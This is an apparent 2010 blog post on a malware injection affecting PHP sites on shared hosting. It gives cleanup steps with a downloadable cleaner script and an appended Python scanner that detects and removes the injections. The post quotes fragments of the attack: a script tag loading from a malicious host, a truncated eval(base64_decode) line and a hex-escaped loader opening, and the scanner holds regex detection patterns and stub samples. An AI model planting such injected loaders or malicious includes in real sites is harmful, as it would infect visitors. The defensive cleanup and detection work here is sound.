Sep 17, 2010

Unfortunately, a fellow blogger and I were affected by this attack. Not on this site, but on a couple of others under another account. The first thing you will notice if you are infected is that when you go to a page on your site, a malicious JavaScript snippet will try to redirect you and load the malware from

<script src="http://myblindstudioinfoonline.com/ll.php"

This is injected by the following code, added to the top of all or many of your .php files:

eval(base64_decode("aWYoZnVuY3Rpb....

Many WordPress, Drupal, and Joomla sites, as well as other CMS and PHP-driven sites, could be affected by this, so watch out. Luckily it is not a huge deal to disinfect your files, thanks to the people at http://blog.sucuri.net/2010/09/godaddy-sites-hacked-myblindstudioinfoonline-com-and-hilary-kneber.html for the information posted earlier today and

http://www.blogtips.org/godaddy-hacked-again-another-way-to-cure/ for the easy-to-follow instructions. In case you want the details right now, here is the meat of it.

The script will work not only for GoDaddy + WordPress, but for any PHP-based site on any host (I used it this morning to cure a Drupal site).

Here are the right steps to follow:

  1. Make sure you back up your site, just to be safe. There are many tools to do so, but a “brute force” copy of your entire blog directory to your local computer using an FTP tool like FileZilla works fine.
  2. Download this zip file. It contains a file called “fixfiles.php”. Extract it and store it on your computer.
     (OK, no zip file? Here is the fixfilesphp.txt version. Save it as fixfiles.php.)
  3. FTP the “fixfiles.php” file to the root directory of your blog. In GoDaddy, that is the /HTML directory (which also contains index.php, wp-login.php, etc.):

     [Image: GoDaddy root directory]

  4. If you only want to clean a subdirectory (and its underlying tree), put the file in that subdirectory, but remember that the command in the next step will also have to reflect that.
  5. Then execute the code by visiting:

     http://yoursite.com/fixfiles.php

     or

     http://yoursite.com/subdir/fixfiles.php

     (if you put it in a subdirectory).

  6. The code will first scan for the malware code in your files, in both the directory it is put in and all underlying directories.
     If you get the message:

     0 Infected Files in ./

     …then your site is clean.
     If any malware is found, the script will list the infected files and prompt you to fix them:

     [Image: malware found - fix the files]

     Click on “Fix Files”, then click OK on the prompt to proceed:

     [Image: prompt to fix malware]

  7. The script will scan through all files again and clean the malware. It will list all files that were cleaned.

     [Image: malware scan finished]

  8. Delete the “fixfiles.php” file from your site after execution.
  9. If you are using a caching plug-in, don’t forget to CLEAR YOUR CACHE; otherwise the malware will continue to be served to your users, even though you cleaned your .php code.

All of that is “curing” the problem. I have looked everywhere, but have yet to find a way to “avoid” the infection. It looks like the hackers found a loophole in Linux shared hosts (and not just those on GoDaddy), which the hosting companies have been unable to identify and/or close.

Until such time, scan your sites every day, and cure the problem immediately, before your visitors get infected.

Picture courtesy Owning Pink

October 31, 2010 UPDATE – Shared hosting on GoDaddy has again been hit by hackers. This time the offending first line in all your .php files begins with <?php /**/ $_8b7b="\x63\x72\x65\x61\x74\x65'

Here is a link to a modified blog-cleaner.php that will take care of this exploit exactly as the last one did.

http://www.mediafire.com/?922k0m8ml1cawug

FTP the file to the root of your compromised website and then browse to http://yourblog/blog-cleaner-new.php

Thanks to Dougie Fresh from http://pics4twitts.com for noticing the problem, and thanks to the people above for the original solution.
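As an added illustration of what the cleaner scripts above do (this is my own example, not fixfiles.php or blog-cleaner.php from the linked blogs), here is a small Python scanner that walks a directory tree of .php files, reports the two injections named on this page, and strips them only when asked; it is meant to be run against the local backup copy from step 1 rather than on the host. The one-line `<?php /**/ ... ?>` wrapper around the eval call, the generic match on the variable name of the October variant, and the sample files are assumptions or constructed test data, not captured from a real site.

```python
import re
import tempfile
from pathlib import Path

# September 2010 variant: eval(base64_decode("...")) prepended to .php files. The one-line
# <?php /**/ ... ?> wrapper is an assumption, so the bare call is also matched as a fallback.
_B64_EVAL = r'eval\(base64_decode\("[A-Za-z0-9+/=]+"\)\);?'
EVAL_B64 = re.compile(rf'<\?php\s*/\*\*/\s*{_B64_EVAL}\s*\?>|{_B64_EVAL}')
# October 2010 variant: the whole first line begins with <?php /**/ $_8b7b="\x63\x72\x65\x61\x74\x65
# (hex-escaped "create"). The variable name is assumed to vary, so it is matched generically.
HEX_CREATE = re.compile(r'^<\?php\s*/\*\*/\s*\$_\w+\s*=\s*"\\x63\\x72\\x65\\x61\\x74\\x65.*\n?')

def clean_source(src: str) -> tuple[str, list[str]]:
    """Return (cleaned contents, findings) for one PHP file; unchanged input means it is clean."""
    findings = []
    src, n = HEX_CREATE.subn("", src)
    if n:
        findings.append("October variant: hex-escaped create loader (first line removed)")
    cleaned, n = EVAL_B64.subn("", src)
    if n:
        findings.append(f"September variant: eval(base64_decode(...)) removed x{n}")
        src = cleaned.lstrip("\r\n")  # drop the blank line the one-line wrapper leaves behind
    return src, findings

def scan_tree(root: Path, fix: bool = False) -> dict[str, list[str]]:
    """Walk every .php file under root (as fixfiles.php does); rewrite files only when fix=True."""
    report = {}
    for path in sorted(root.rglob("*.php")):
        src = path.read_text(encoding="utf-8", errors="surrogateescape")
        cleaned, findings = clean_source(src)
        if findings:
            report[path.relative_to(root).as_posix()] = findings
            if fix:
                path.write_text(cleaned, encoding="utf-8", errors="surrogateescape")
    return report

# Constructed sample files (not captured from a real site): one per variant plus a clean one.
SAMPLE_SEP = '<?php /**/eval(base64_decode("aWYoZnVuY3Rpb24AAAA="));?>\n<?php\n/** Front to WordPress. */\n'
SAMPLE_OCT = '<?php /**/ $_8b7b="\\x63\\x72\\x65\\x61\\x74\\x65"; ?>\n<?php\necho "hi";\n'
SAMPLE_CLEAN = '<?php\n$x = base64_decode($y); // no eval, so legitimate use is left alone\n'

def run_demo() -> tuple[dict, dict]:
    """Build a throwaway webroot, clean it, rescan it; returns the (before, after) reports."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "wp-content").mkdir()
        (root / "index.php").write_text(SAMPLE_SEP)
        (root / "wp-content" / "plugin.php").write_text(SAMPLE_OCT)
        (root / "wp-login.php").write_text(SAMPLE_CLEAN)
        return scan_tree(root, fix=True), scan_tree(root)
```

For real use, point scan_tree at the backup directory with fix=False first and review the report before re-running with fix=True, then re-upload only the files it changed.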
